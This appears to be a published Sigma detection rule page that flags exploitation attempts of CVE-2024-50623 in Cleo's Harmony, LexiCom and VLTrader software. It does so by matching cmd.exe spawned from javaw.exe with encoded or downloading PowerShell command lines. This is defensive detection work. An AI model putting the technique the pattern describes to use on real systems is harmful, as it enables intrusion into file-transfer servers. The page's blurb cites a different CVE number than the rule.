CVE-2024-50623 Exploitation Attempt - Cleo
Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
Sigma rule (View on GitHub)
1title: CVE-2024-50623 Exploitation Attempt - Cleo
2id: f007b877-02e3-45b7-8501-1b78c2864029
3status: experimental
4description: |
5 Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
6references:
7 - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
8author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
9date: 2024-12-09
10tags:
11 - attack.execution
12 - attack.t1190
13 - cve.2024-50623
14 - detection.emerging-threats
15logsource:
16 category: process_creation
17 product: windows
18detection:
19 selection:
20 ParentImage|endswith: '\javaw.exe'
21 ParentCommandLine|contains:
22 - 'Harmony'
23 - 'lexicom'
24 - 'VersaLex'
25 - 'VLTrader'
26 Image|endswith: '\cmd.exe'
27 CommandLine|contains:
28 - 'powershell'
29 - ' -enc '
30 - ' -EncodedCommand'
31 - '.Download'
32 condition: selection
33falsepositives:
34 - Unlikely
35level: high
yaml
References
-
Huntress identified an emerging threat involving Cleo’s LexiCom, VLTransfer, and Harmony software, known as CVE-2024-55956, commonly used to manage file transfers. Read more about this emerging threat on the Huntress Blog.
Read More
Related rules
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
- Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
- DNS RCE CVE-2020-1350
- Exploited CVE-2020-10189 Zoho ManageEngine